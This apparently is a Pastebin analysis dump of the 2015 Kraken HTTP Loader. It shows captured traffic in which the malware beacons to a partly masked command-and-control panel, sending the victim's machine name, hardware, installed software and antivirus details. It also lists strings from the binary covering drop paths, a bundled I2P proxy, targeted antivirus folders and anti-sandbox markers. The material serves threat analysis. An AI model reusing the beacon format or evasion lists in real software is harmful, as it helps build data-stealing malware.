Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Kraken HTTP Loader - 2015
- GET http://94.156.xxx.xxx/panel/includes/verif.php HTTP/1.0
- HTTP/1.1 200 OK
- Date: Thu, 05 Feb 2015 07:56:22 GMT
- Server: Apache/2.2.22 (Debian)
- X-Powered-By: PHP/5.4.36-0+deb7u1
- Vary: Accept-Encoding
- Content-Length: 1
- Connection: close
- Content-Type: text/html
- 1
- --
- GET http://94.156.xxx.xxx/panel/includes/fileupload.php HTTP/1.0
- HTTP/1.1 200 OK
- Date: Thu, 05 Feb 2015 07:56:23 GMT
- Server: Apache/2.2.22 (Debian)
- X-Powered-By: PHP/5.4.36-0+deb7u1
- Set-Cookie: PHPSESSID=vgm1ffpdpgjeojfn4jo9cf6ij1; path=/
- Expires: Thu, 19 Nov 1981 08:52:00 GMT
- Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
- Pragma: no-cache
- Vary: Accept-Encoding
- Content-Length: 1
- Connection: close
- Content-Type: text/html
- 0
- --
- GET http://94.156.xxx.xxx/panel/includes/f_i_l_e_h_o_s_t.php HTTP/1.0
- HTTP/1.1 200 OK
- Date: Thu, 05 Feb 2015 07:56:24 GMT
- Server: Apache/2.2.22 (Debian)
- X-Powered-By: PHP/5.4.36-0+deb7u1
- Set-Cookie: PHPSESSID=6thrarifgctqil07hgpi7veut2; path=/
- Expires: Thu, 19 Nov 1981 08:52:00 GMT
- Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
- Pragma: no-cache
- Vary: Accept-Encoding
- Content-Length: 1
- Connection: close
- Content-Type: text/html
- 0
- --
- GET http://94.156.xxx.xxx/panel/includes/persis.php HTTP/1.0
- HTTP/1.1 200 OK
- Date: Thu, 05 Feb 2015 07:56:25 GMT
- Server: Apache/2.2.22 (Debian)
- X-Powered-By: PHP/5.4.36-0+deb7u1
- Set-Cookie: PHPSESSID=df5vcfuhp06buj5sttss824e02; path=/
- Expires: Thu, 19 Nov 1981 08:52:00 GMT
- Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
- Pragma: no-cache
- Vary: Accept-Encoding
- Content-Length: 1
- Connection: close
- Content-Type: text/html
- 0
- --
- GET http://94.156.xxx.xxx/panel/includes/btcplugin.php HTTP/1.0
- HTTP/1.1 200 OK
- Date: Thu, 05 Feb 2015 07:56:26 GMT
- Server: Apache/2.2.22 (Debian)
- X-Powered-By: PHP/5.4.36-0+deb7u1
- Set-Cookie: PHPSESSID=el5341ajdcecaa316mro7tssg1; path=/
- Expires: Thu, 19 Nov 1981 08:52:00 GMT
- Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
- Pragma: no-cache
- Vary: Accept-Encoding
- Content-Length: 0
- Connection: close
- Content-Type: text/html
- --
- GET http://94.156.xxx.xxx/panel/includes/d_elay.php HTTP/1.0
- HTTP/1.1 200 OK
- Date: Thu, 05 Feb 2015 07:56:31 GMT
- Server: Apache/2.2.22 (Debian)
- X-Powered-By: PHP/5.4.36-0+deb7u1
- Set-Cookie: PHPSESSID=ljhhe8nescblgvn00cu74sb7s7; path=/
- Expires: Thu, 19 Nov 1981 08:52:00 GMT
- Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
- Pragma: no-cache
- Vary: Accept-Encoding
- Content-Length: 5
- Connection: close
- Content-Type: text/html
- 60000
- --
- GET http://94.156.xxx.xxx/panel/includes/day.php HTTP/1.0
- HTTP/1.1 200 OK
- Date: Thu, 05 Feb 2015 07:56:33 GMT
- Server: Apache/2.2.22 (Debian)
- X-Powered-By: PHP/5.4.36-0+deb7u1
- Vary: Accept-Encoding
- Content-Length: 8
- Connection: close
- Content-Type: text/html
- 20150205
- --
- GET http://94.156.xxx.xxx/panel/includes/ip.php HTTP/1.0
- HTTP/1.1 200 OK
- Date: Thu, 05 Feb 2015 07:56:34 GMT
- Server: Apache/2.2.22 (Debian)
- X-Powered-By: PHP/5.4.36-0+deb7u1
- Vary: Accept-Encoding
- Content-Length: 13
- Connection: close
- Content-Type: text/html
- xxx.xxx.xxx.xxx
- --
- GET http://94.156.xxx.xxx/panel/includes/country.php?IP=xxx.xxx.xxx.xxx HTTP/1.0
- HTTP/1.1 200 OK
- Date: Thu, 05 Feb 2015 07:56:36 GMT
- Server: Apache/2.2.22 (Debian)
- X-Powered-By: PHP/5.4.36-0+deb7u1
- Vary: Accept-Encoding
- Content-Length: 9
- Connection: close
- Content-Type: text/html
- Australia
- --
- GET /panel/includes/idcontact.php?COMPUTER=xxxxx-PC-49&steam=0&origin=0&webnavig=1&java=0&net=1&memoireRAMbytes=1073274880&diskhard=68611469312&avname=0&parefire=0&install=20150205&gpu=0&cpu=Intel(R)Core(TM)i7-4710MQCPU@2.50GHz HTTP/1.0
- Host: 94.156.xxx.xxx
- User-Agent: crackim
- Connection: Close
- HTTP/1.1 200 OK
- Date: Thu, 05 Feb 2015 07:56:37 GMT
- Server: Apache/2.2.22 (Debian)
- X-Powered-By: PHP/5.4.36-0+deb7u1
- Set-Cookie: PHPSESSID=6ia3s0tisrn2ek2scvr2evfp72; path=/
- Expires: Thu, 19 Nov 1981 08:52:00 GMT
- Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
- Pragma: no-cache
- Vary: Accept-Encoding
- Content-Length: 14
- Connection: close
- Content-Type: text/html
- Statistics Ok!
- --
- GET http://94.156.xxx.xxx/panel/includes/bkill.php HTTP/1.0
- HTTP/1.1 200 OK
- Date: Thu, 05 Feb 2015 07:56:38 GMT
- Server: Apache/2.2.22 (Debian)
- X-Powered-By: PHP/5.4.36-0+deb7u1
- Set-Cookie: PHPSESSID=12nvu44selb1d89dghcc0g9bs4; path=/
- Expires: Thu, 19 Nov 1981 08:52:00 GMT
- Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
- Pragma: no-cache
- Vary: Accept-Encoding
- Content-Length: 1
- Connection: close
- Content-Type: text/html
- 0
- --
- GET http://94.156.xxx.xxx/panel/includes/install_info.php HTTP/1.0
- HTTP/1.1 200 OK
- Date: Thu, 05 Feb 2015 07:56:40 GMT
- Server: Apache/2.2.22 (Debian)
- X-Powered-By: PHP/5.4.36-0+deb7u1
- Vary: Accept-Encoding
- Content-Length: 8
- Connection: close
- Content-Type: text/html
- 20150205
- --
- GET http://94.156.xxx.xxx/panel/includes/pinginfo.php HTTP/1.0
- HTTP/1.1 200 OK
- Date: Thu, 05 Feb 2015 07:57:47 GMT
- Server: Apache/2.2.22 (Debian)
- X-Powered-By: PHP/5.4.36-0+deb7u1
- Vary: Accept-Encoding
- Content-Length: 2
- Connection: close
- Content-Type: text/html
- 57
- --
- GET /panel/includes/get.php?IP=xxx.xxx.xxx.xxx&COMPUTER=xxxxx-PC-49&OS=Windows7&COUNTRY=[redacted]&HWID={e29xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}{24 numbers}&INSTALL=20150205&PING=57&INSTAL=20150205&V=1.3&Arch=32 HTTP/1.0
- Host: 94.156.xxx.xxx
- User-Agent: crackim
- Connection: Close
- HTTP/1.1 200 OK
- Date: Thu, 05 Feb 2015 07:57:48 GMT
- Server: Apache/2.2.22 (Debian)
- X-Powered-By: PHP/5.4.36-0+deb7u1
- Set-Cookie: PHPSESSID=bbau8mcveutda9bjbd66prmp56; path=/
- Expires: Thu, 19 Nov 1981 08:52:00 GMT
- Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
- Pragma: no-cache
- Vary: Accept-Encoding
- Content-Length: 0
- Connection: close
- Content-Type: text/html
- --
- GET http://94.156.xxx.xxx/panel/includes/post.php HTTP/1.0
- HTTP/1.1 200 OK
- Date: Thu, 05 Feb 2015 07:57:49 GMT
- Server: Apache/2.2.22 (Debian)
- X-Powered-By: PHP/5.4.36-0+deb7u1
- Set-Cookie: PHPSESSID=qrdsv1aneibeds76bj686flvh3; path=/
- Expires: Thu, 19 Nov 1981 08:52:00 GMT
- Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
- Pragma: no-cache
- Vary: Accept-Encoding
- Content-Length: 2
- Connection: close
- Content-Type: text/html
- *0
- --
- SOME STRINGS
- 0x4120b8 (11): getnameinfo
- 0x4120c4 (12): freeaddrinfo
- 0x4120d4 (11): getaddrinfo
- 0x4120e0 (10): ws2_32.dll
- 0x41301a (38): \System\Oracle\azioklmpx\i2p\jbigi.dll
- 0x413042 (67): \System\Oracle\azioklmpx\i2p\certificates\ssl\ieb9oopo.mooo.com.crt
- 0x413086 (22): (x86)\AVAST Software\
- 0x4130a0 (37): i2p/certificates/ssl/link.mx24.eu.crt
- 0x4130c6 (40): \System\Oracle\azioklmpx\i2p\lib\BOB.jar
- 0x4130ef (14): (x86)\Google\
- 0x4130fe (37): i2p/set_config_dir_for_nt_service.bat
- 0x413124 (39): i2p/certificates/ssl/193.150.121.66.crt
- 0x41314c (25): i2p/lib/routerconsole.jar
- 0x41316f (10): persis.php
- 0x413182 (13): i2p/admin.exe
- 0x413190 (26): i2p/lib/jasper-runtime.jar
- 0x4131ab (69): \System\Oracle\azioklmpx\i2p\certificates\reseed\swat_at_mail.i2p.crt
- 0x413207 (13): btcplugin.php
- 0x41321c (55): \System\Oracle\azioklmpx\i2p\lib\jetty-continuation.jar
- 0x413254 (18): i2p/icons/iggy.xpm
- 0x41329f (51): \System\Oracle\azioklmpx\i2p\lib\jetty-security.jar
- 0x4132d3 (41): i2p/certificates/news/zzz_at_mail.i2p.crt
- 0x413342 (18): i2p/lib/jrobin.jar
- 0x413355 (12): kit47896.exe
- 0x413362 (15): 414fileh0st.exe
- 0x413372 (35): \System\Oracle\azioklmpx\search.exe
- 0x413396 (45): i2p/certificates/reseed/bugme_at_mail.i2p.crt
- 0x4133c4 (16): i2p/lib/jstl.jar
- 0x4133d5 (42): \System\Oracle\azioklmpx\i2p\lib\jbigi.jar
- 0x413400 (33): \System\Oracle\azioklmpx\i2p\lib\
- 0x413424 (49): \System\Oracle\azioklmpx\i2p\certificates\reseed\
- 0x413467 (54): \System\Oracle\azioklmpx\i2p\lib\org.mortbay.jetty.jar
- 0x41349e (29): \System\Oracle\azioklmpx\i2p\
- 0x4134be (13): (x86)\Opera\
- 0x4134d4 (40): \System\Oracle\azioklmpx\i2p\lib\sam.jar
- 0x41350f (41): \System\Oracle\azioklmpx\i2p\lib\jstl.jar
- 0x413541 (67): \System\Oracle\azioklmpx\i2p\certificates\ssl\jp.reseed.i2p2.no.crt
- 0x4135d4 (15): country.php?IP=
- 0x4135e6 (70): \System\Oracle\azioklmpx\i2p\certificates\router\str4d_at_mail.i2p.crt
- 0x41363a (10): &COMPUTER=
- 0x413645 (66): \System\Oracle\azioklmpx\i2p\certificates\news\zzz_at_mail.i2p.crt
- 0x413688 (26): i2p/lib/jetty-servlets.jar
- 0x4136c0 (64): \System\Oracle\azioklmpx\i2p\certificates\ssl\193.150.121.66.crt
- 0x413706 (52): \System\Oracle\azioklmpx\i2p\lib\commons-logging.jar
- 0x41374f (61): \System\Oracle\azioklmpx\i2p\certificates\ssl\reseed.info.crt
- 0x41378d (38): \System\Oracle\azioklmpx\i2p\value.txt
- 0x4137e8 (48): \System\Oracle\azioklmpx\i2p\webapps\susidns.war
- 0x413819 (46): \System\Oracle\azioklmpx\i2p\lib\streaming.jar
- 0x413848 (25): i2p/lib/jetty-servlet.jar
- 0x413862 (18): i2p/icons/iggy.ico
- 0x413875 (20): i2p/lib/jetty-io.jar
- 0x4139a1 (38): i2p/certificates/ssl/netdb.i2p2.no.crt
- 0x4139c8 (16): install_info.php
- 0x4139ec (47): \System\Oracle\azioklmpx\i2p\lib\mstreaming.jar
- 0x413a1c (45): \System\Oracle\azioklmpx\i2p\lib\jetty-io.jar
- 0x413a4a (14): (x86)\comodo\
- 0x413b5a (25): i2p/lib/javax.servlet.jar
- 0x413b74 (21): i2p/lib/i2ptunnel.jar
- 0x413b8a (44): i2p/certificates/reseed/swat_at_mail.i2p.crt
- 0x413bb7 (11): (x86)\AVG\
- 0x413bc3 (52): \System\Oracle\azioklmpx\i2p\lib\jetty-sslengine.jar
- 0x413c17 (70): \System\Oracle\azioklmpx\i2p\certificates\news\echelon_at_mail.i2p.crt
- 0x413c78 (36): \System\Oracle\azioklmpx\ext\ext.txt
- 0x413c9d (46): \System\Oracle\azioklmpx\i2p\lib\jetty-xml.jar
- 0x413cd8 (24): i2p/geoip/geoipv6.dat.gz
- 0x413d1e (11): i2p/i2p.exe
- 0x413d3e (47): i2p/certificates/reseed/echelon_at_mail.i2p.crt
- 0x413d76 (49): \System\Oracle\azioklmpx\i2p\scripts\i2pProxy.pac
- 0x413db5 (47): \System\Oracle\azioklmpx\i2p\lib\desktopgui.jar
- 0x413de5 (34): \System\Oracle\azioklmpx\unrar.lib
- 0x413e08 (13): (x86)\Steam\
- 0x413e16 (34): i2p/lib/jetty-java5-threadpool.jar
- 0x413e39 (17): &memoireRAMbytes=
- 0x413e55 (22): i2p/lib/jetty-http.jar
- 0x413e6f (33): i2p/install_i2p_service_winnt.bat
- 0x413e91 (30): \System\Oracle\azioklmpx\hzid\
- 0x413eb0 (20): i2p/lib/standard.jar
- 0x413ec5 (45): i2p/certificates/reseed/sindu_at_mail.i2p.crt
- 0x413f11 (47): \System\Oracle\azioklmpx\i2p\lib\jetty-util.jar
- 0x413f4f (50): i2p/certificates/router/killyourtv_at_mail.i2p.crt
- 0x413f8d (18): i2p/lib/router.jar
- 0x413fac (45): \System\Oracle\azioklmpx\i2p\lib\standard.jar
- 0x413fda (22): i2p/lib/commons-el.jar
- 0x413ff1 (16): gettask.php?RUN=
- 0x414002 (17): i2p/lib/jbigi.jar
- 0x4140df (16): \bitck1\Text.txt
- 0x41410a (29): i2p/lib/org.mortbay.jetty.jar
- 0x414131 (62): \System\Oracle\azioklmpx\i2p\certificates\ssl\link.mx24.eu.crt
- 0x414170 (24): i2p/lib/jetty-webapp.jar
- 0x41418c (40): \System\Oracle\azioklmpx\i2p\wrapper.log
- 0x4141b5 (14): (x86)\McAfee\
- 0x4141d3 (75): \System\Oracle\azioklmpx\i2p\certificates\router\killyourtv_at_mail.i2p.crt
- 0x4142d5 (14): fileupload.php
- 0x4142f7 (49): \System\Oracle\azioklmpx\i2p\lib\jetty-webapp.jar
- 0x41432f (23): \System\Oracle\smss.exe
- 0x414392 (46): \System\Oracle\azioklmpx\i2p\lib\systray4j.dll
- 0x4143c1 (46): i2p/certificates/reseed/backup_at_mail.i2p.crt
- 0x4143f0 (19): i2p/lib/wrapper.dll
- 0x414409 (25): i2p/webapps/i2ptunnel.war
- 0x41443e (23): i2p/webapps/susidns.war
- 0x414456 (21): i2p/lib/streaming.jar
- 0x41446c (11): sandboxfuck
- 0x41447c (15): i2p/wrapper.log
- 0x414499 (10): d_elay.php
- 0x4144d6 (43): \System\Oracle\azioklmpx\i2p\wrapper.config
- 0x414502 (48): \System\Oracle\azioklmpx\i2p\geoip\countries.txt
- 0x414533 (44): \System\Oracle\azioklmpx\i2p\geoip\geoip.txt
- 0x414572 (42): i2p/certificates/ssl/us.reseed.i2p2.no.crt
- 0x4145a5 (23): i2p/geoip/countries.txt
- 0x4145bd (58): \System\Oracle\azioklmpx\i2p\install_i2p_service_winnt.bat
- 0x4145f8 (42): i2p/certificates/ssl/uk.reseed.i2p2.no.crt
- 0x414623 (19): i2p/geoip/geoip.txt
- 0x414637 (37): \System\Oracle\azioklmpx\i2p\scripts\
- 0x41465d (71): \System\Oracle\azioklmpx\i2p\certificates\ssl\reseed.i2p-projekt.de.crt
- 0x4146a5 (19): i2p/lib/systray.jar
- 0x4146b9 (37): \System\Oracle\azioklmpx\i2p\webapps\
- 0x4146f2 (37): i2p/certificates/ssl/i2p.mooo.com.crt
- 0x414718 (42): i2p/certificates/ssl/cert.smartcom.org.crt
- 0x414743 (21): i2p/lib/jetty-xml.jar
- 0x414759 (30): i2p/lib/jetty-continuation.jar
- 0x414781 (27): i2p/lib/jasper-compiler.jar
- 0x41479d (58): \System\Oracle\azioklmpx\i2p\lib\jetty-rewrite-handler.jar
- 0x4147e7 (12): pinginfo.php
- 0x4147f4 (49): \System\Oracle\azioklmpx\i2p\geoip\geoipv6.dat.gz
- 0x414826 (35): \System\Oracle\azioklmpx\i2p\geoip\
- 0x41484a (26): i2p/lib/jetty-security.jar
- 0x414865 (47): \System\Oracle\azioklmpx\i2p\certificates\news\
- 0x41489d (43): \System\Oracle\azioklmpx\i2p\systray.config
- 0x414981 (42): \System\Oracle\azioklmpx\i2p\certificates\
- 0x4149ac (14): (x86)\G Data\
- 0x4149bb (51): \System\Oracle\azioklmpx\i2p\lib\jasper-runtime.jar
- 0x4149ef (24): C:\Program Files\McAfee\
- 0x414a80 (46): \System\Oracle\azioklmpx\i2p\lib\systray4j.jar
- 0x414ab8 (75): \System\Oracle\azioklmpx\i2p\certificates\reseed\killyourtv_at_mail.i2p.crt
- 0x414b58 (43): \System\Oracle\azioklmpx\i2p\lib\jrobin.jar
- 0x414b84 (19): i2p/lib/wrapper.jar
- 0x414b98 (27): i2p/lib/org.mortbay.jmx.jar
- 0x414bb4 (23): i2p/lib/jetty-start.jar
- 0x414bcc (21): (x86)\Kaspersky Lab\
- 0x414c47 (52): \System\Oracle\azioklmpx\i2p\webapps\addressbook.war
- 0x414d2e (43): i2p/certificates/news/str4d_at_mail.i2p.crt
- 0x414f58 (22): i2p/lib/mstreaming.jar
- 0x414f7a (21): i2p/lib/systray4j.dll
- 0x414f90 (77): User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
- 0x414fde (12): (x86)\ESET\
- 0x415089 (46): \System\Oracle\azioklmpx\i2p\lib\jetty-i2p.jar
- 0x4150b8 (13): btcplugin.exe
- 0x4150c6 (38): \System\Oracle\azioklmpx\i2p\admin.exe
- 0x415154 (10): &diskhard=
- 0x41525a (29): i2p/webapps/routerconsole.war
- 0x4153c2 (52): \System\Oracle\azioklmpx\i2p\lib\jasper-compiler.jar
- 0x415410 (67): \System\Oracle\azioklmpx\i2p\certificates\ssl\us.reseed.i2p2.no.crt
- 0x41547f (24): i2p/scripts/i2pProxy.pac
- 0x41563a (10): &webnavig=
- 0x41564c (22): i2p/lib/jetty-util.jar
- 0x415663 (15): i2p/lib/BOB.jar
- 0x415673 (23): idcontact.php?COMPUTER=
- 0x41568b (68): \System\Oracle\azioklmpx\i2p\certificates\router\zzz_at_mail.i2p.crt
- 0x4156d0 (15): Virtual_Machine
- 0x4156e0 (40): \System\Oracle\azioklmpx\i2p\lib\i2p.jar
- 0x415709 (33): i2p/lib/jetty-rewrite-handler.jar
- 0x41572b (39): \System\Oracle\azioklmpx\i2p\jcpuid.dll
- 0x4159fa (38): \System\Oracle\azioklmpx\hzid\hzid.txt
- 0x415a8c (32): \System\Oracle\azioklmpx\key.exe
- 0x415b29 (47): \System\Oracle\azioklmpx\i2p\lib\commons-el.jar
- 0x415bae (10): &parefire=
- 0x415bb9 (10): click.pack
- 0x415c67 (33): (x86)\Malwarebytes Anti-Malware\
- 0x415ccb (19): (x86)\BitDefender\
- 0x415cdf (19): f_i_l_e_h_o_s_t.php
- 0x415cf3 (44): i2p/certificates/reseed/meeh_at_mail.i2p.crt
- 0x415d20 (39): (x86)\AntiVir PersonalEdition Classic\
- 0x415e60 (50): \System\Oracle\azioklmpx\i2p\lib\javax.servlet.jar
- 0x415e93 (46): \System\Oracle\azioklmpx\i2p\lib\i2ptunnel.jar
- 0x416185 (27): i2p/lib/jetty-sslengine.jar
- 0x4161a1 (32): (x86)\Norton Internet Security\
- ---
- Refs:
- http://blogs.quickheal.com/wp/malware-case-study-kraken-rat-running-behind-bitcoins/
- https://ica.su/showthread.php?t=82234
Add Comment
Please, Sign In to add comment